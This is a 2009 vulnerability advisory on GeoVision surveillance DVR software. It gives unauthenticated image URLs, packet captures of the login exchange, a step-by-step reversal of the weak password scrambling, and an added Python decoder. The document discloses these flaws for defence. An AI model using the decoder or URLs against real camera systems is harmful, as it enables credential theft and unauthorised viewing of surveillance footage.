GeoVision Digital Video Surveillance System Multiple Privilege Escalation
  Add date: 03/04/2009   Publishing date: 03/04/2009

Vulnerable Systems:
 * GeoVision Digital Video Surveillance System version 7.0 and prior

Privilege Escalation 1:
When the GeoVision software is configured to create JPEG images for use with the JPEG Image Viewer, no authentication is required to view those images.

Using GeoVision's own demonstration as an example, the following URLs can be used to access images. This is true even for servers that require a username and password for authentication; in the current GeoVision demonstration only a username is required to access footage. This method works on GeoVision systems that are configured to create JPEG images. It also works on GeoVision systems that are not configured with the 'Enhanced Network Security' feature, which is understood to be the default setting.

Proof of Concept:
http://webcam.geovision.com.tw/cam0.jpg
...
http://webcam.geovision.com.tw/cam3.jpg

Privilege Escalation 2:
During the authentication phase of the live playback client, the username part of the authentication exchange is passed in plain text. In this partial dump taken using tcpflow the username is seen to be 'gvUser'.

Network dump of an authentication attempt:
--------------------- Network traffic sniffer ---------------------
192.168.105.136:01187-192.168.105.130:00514: ....
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
192.168.105.136:01186-192.168.105.130:04550: 2.
-------------------------------------------------------------------

The password is scrambled with a simple transformation of the hex values of its ASCII characters. This scrambling is just as simple to reverse, as the example below shows.

Sniff from network:
--------------------- Network traffic sniffer ---------------------
192.168.105.130:04550-192.168.105.136:01186: RDY.
192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
192.168.105.130:04550-192.168.105.136:01186: ...
-------------------------------------------------------------------

Here we see the username 'gvUser', still in plain text, and the scrambled password '7d6a6666636e'. To get from the scrambled string back to the original password, a few simple steps are performed.

Split the string into pairs of hex digits:
0x7d
0x6a
0x66
0x66
0x63
0x6e

Each pair represents one character in the original password, so this scrambled string is for a password of 6 characters.

Iterate through the pairs, subtracting a decreasing number from each: start with 0x6 for the first character, since this password has 6 characters, and count down to 0x1 for the last.

0x7d - 0x6 = 0x77
0x6a - 0x5 = 0x65
0x66 - 0x4 = 0x62
0x66 - 0x3 = 0x63
0x63 - 0x2 = 0x61
0x6e - 0x1 = 0x6d

Then use an ASCII table to translate the results into characters:

0x77 = w
0x65 = e
0x62 = b
0x63 = c
0x61 = a
0x6d = m

So the original password was 'webcam'.
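The descrambling walked through above, implemented as an added example (this is not GeoVision's code; the function names unscramble and scramble are my own). It also includes the inverse so that the round trip makes the point plainly: the scheme is a fixed per-position offset on ASCII values, not a hash, so anything captured on the wire is recoverable.

```python
"""Added example: decode and re-encode the GeoVision password scrambling
described in the advisory. Sample values are the advisory's own
('7d6a6666636e' <-> 'webcam'); nothing here talks to the network."""


def unscramble(scrambled_hex: str) -> str:
    """Recover the password from the hex string seen on the wire.

    Each two-hex-digit pair is one character. For an n-character password,
    pair i (0-based) has had (n - i) added to the character's ASCII value,
    so the offset counts down from n for the first character to 1 for the last.
    """
    if len(scrambled_hex) % 2 != 0:
        raise ValueError("scrambled string must consist of whole hex pairs")
    pairs = [scrambled_hex[i:i + 2] for i in range(0, len(scrambled_hex), 2)]
    n = len(pairs)
    chars = []
    for i, pair in enumerate(pairs):
        value = int(pair, 16) - (n - i)
        if not 0x20 <= value < 0x7F:  # a real password decodes to printable ASCII
            raise ValueError(f"pair {pair!r} does not decode to printable ASCII")
        chars.append(chr(value))
    return "".join(chars)


def scramble(password: str) -> str:
    """Inverse of unscramble: add the same per-position offset back."""
    n = len(password)
    return "".join(f"{ord(c) + (n - i):02x}" for i, c in enumerate(password))


if __name__ == "__main__":
    wire = "7d6a6666636e"        # scrambled value from the advisory's dump
    print(unscramble(wire))      # webcam
    print(scramble("webcam") == wire)
```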

This issue is encountered for all the authentication options below:
Mpeg4 Encoder Viewer
56kMpegView0.htm
